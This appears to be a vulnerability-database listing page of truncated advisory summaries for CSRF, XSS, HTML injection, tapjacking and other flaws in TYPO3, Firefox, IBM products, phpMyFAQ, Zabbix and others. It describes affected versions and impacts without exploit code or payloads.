GHSA-4G52-PQ8J-6QV5 TYPO3 Extension Manager Module vulnerable to Cross-Site Request Forgery

Problem A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery CSRF. Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP...

Exposed Dangerous Method or Function

Overview Affected versions of this package are vulnerable to Exposed Dangerous Method or Function via the backend user interface functionality involving deep links. An attacker can manipulate the victim's dashboard configuration by deceiving the victim into interacting with a malicious URL while...

TYPO3 Cross-Site Request Forgery in Dashboard Module

Problem A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery CSRF. Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP...

GHSA-CJFR-9F5R-3Q93 TYPO3 Cross-Site Request Forgery in Log Module

Problem A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery CSRF. Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP...

The vulnerability of the Mozilla Firefox browser and the Thunderbird email client on Android operating systems stems from an improper limitation on the displayed layers of the user interface. This allows attackers to execute a type of attack known as tapjacking.

The vulnerability of the Mozilla Firefox browser and the Thunderbird email client on Android operating systems is related to an improper limitation on the displayed layers of the user interface. Exploiting this vulnerability allows a remote attacker to perform a type of attack known as tapjacking...

SAP GUI 安全漏洞

SAP GUI is an application from SAP, a German company. graphical user interface for SAP systems. A security vulnerability exists in SAP GUI for Windows that stems from storing user input on the client PC to improve usability, and an attacker is able to read this data...

CVE-2021-29669

IBM Jazz Foundation 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session...

CVE-2024-49785

IBM watsonx.ai 1.1 through 2.0.3 and IBM watsonx.ai on Cloud Pak for Data 4.8 through 5.0.3 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to...

IBM Jazz Foundation 跨站脚本漏洞

IBM Jazz Foundation is a next-generation collaboration platform for software delivery technology from International Business Machines IBM. A cross-site scripting vulnerability exists in IBM Jazz Foundation. An attacker could exploit the vulnerability to embed arbitrary JavaScript code in the Web ...

IBM watsonx.ai 跨站脚本漏洞

IBM watsonx.ai is a library from International Business Machines IBM, Inc. Allows the use of the watsonx.ai service on IBM Cloud and IBM Cloud for Data. A cross-site scripting vulnerability exists in IBM watsonx.ai versions 1.1 through 2.0.3 and IBM watsonx.ai on Cloud Pak for Data versions 4.8...

PT-2025-2861 · Ibm · Cloud Pak For Data +1

Name of the Vulnerable Software and Affected Versions: IBM watsonx.ai versions 1.1 through 2.0.3 IBM watsonx.ai on Cloud Pak for Data versions 4.8 through 5.0.3 Description: This issue allows an authenticated user to embed arbitrary JavaScript code in the Web UI, altering the intended functionali...

ROS-20250110-06

The vulnerability of the Zabbix universal monitoring system server is related to the use of uncontrolled format strings when processing HttpRequest objects. format strings when processing HttpRequest objects. Exploitation of the vulnerability could allow an attacker, acting remotely, to gain...

CVE-2025-22445

Mattermost versions 10.x = 10.2 fail to accurately reflect missing settings, which allows confusion for admins regarding a Calls security-sensitive configuration via incorrect UI reporting...

Cross-site Scripting (XSS)

phpMyFAQ is vulnerable to Cross-site Scripting XSS. The vulnerability is due to improper sanitization of HTML content in the FAQ editor at http://localhost/admin/index.php?action=editentry . Attackers can inject malformed HTML elements styled to cover the entire screen, disrupting the user...

Huawei HarmonyOS 安全漏洞

Huawei HarmonyOS is an operating system from Huawei, a Chinese company. It provides a full-scene distributed operating system based on a microkernel.Huawei EMUI is an emotional operating system developed by Huawei based on Android Android. A security vulnerability exists in Huawei HarmonyOS and...

CVE-2024-51472

IBM UrbanCode Deploy UCD 7.2 through 7.2.3.13, 7.3 through 7.3.2.8, and IBM DevOps Deploy 8.0 through 8.0.1.3 are vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure...

CVE-2024-31914

IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.5 and 6.2.0.0 through 6.2.0.2 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentia...

IBM Sterling B2B Integrator 跨站脚本漏洞

IBM Sterling B2B Integrator is a suite of software from International Business Machines IBM that integrates critical B2B processes, transactions, and relationships. The software supports secure integration of complex B2B processes with diverse partner communities. A cross-site scripting...

phpMyFAQ Vulnerable to Stored HTML Injection at FAQ

Summary Due to insufficient validation on the content of new FAQ posts, it is possible for authenticated users to inject malicious HTML or JavaScript code that can impact other users viewing the FAQ. This vulnerability arises when user-provided inputs in FAQ entries are not sanitized or escaped...

CVE-2024-56199 phpMyFAQ Vulnerable to Stored HTML Injection at FAQ

phpMyFAQ is an open source FAQ web application. Starting no later than version 3.2.10 and prior to version 4.0.2, an attacker can inject malicious HTML content into the FAQ editor at http://localhost/admin/index.php?action=editentry, resulting in a complete disruption of the FAQ page's user...